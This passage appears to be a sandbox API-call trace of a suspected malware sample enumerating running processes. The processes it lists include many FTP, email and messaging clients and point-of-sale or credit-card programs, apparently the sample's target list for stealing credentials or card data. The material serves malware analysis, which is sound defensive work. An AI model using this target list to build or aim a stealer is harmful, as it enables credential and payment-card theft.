th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0287.473] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0287.475] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0287.476] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0287.478] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0287.482] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0287.484] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0287.485] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0287.487] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0287.488] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0287.490] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0287.491] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0287.493] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0287.494] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0287.514] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0287.515] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0287.517] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0287.518] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0287.520] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0287.521] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0287.523] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0287.524] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0287.525] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0287.532] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0287.535] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0287.537] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0287.539] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0287.545] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0287.547] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0287.549] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0287.550] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0287.552] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0287.553] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0287.555] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0287.607] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0287.609] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0287.611] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0287.613] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0287.615] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0287.617] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0287.619] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0287.624] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0287.626] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0287.628] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0287.630] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0287.631] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0287.633] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0287.635] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0287.846] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0287.849] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0287.851] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0287.853] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0287.933] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0287.936] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0287.938] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0287.941] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0287.943] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0287.945] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0287.947] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0287.950] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0287.952] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0287.954] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0287.955] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0287.957] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0287.959] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0287.960] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0287.962] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0287.963] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0287.968] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0287.970] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0287.973] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0287.976] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0288.074] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0288.077] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0288.079] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0288.081] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0288.083] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0288.086] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0288.087] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0288.089] CloseHandle (hObject=0x21f8) returned 1 [0288.089] Sleep (dwMilliseconds=0x64) [0288.262] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21f8 [0288.275] Process32First (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0288.278] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0288.280] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0288.282] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0288.284] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, 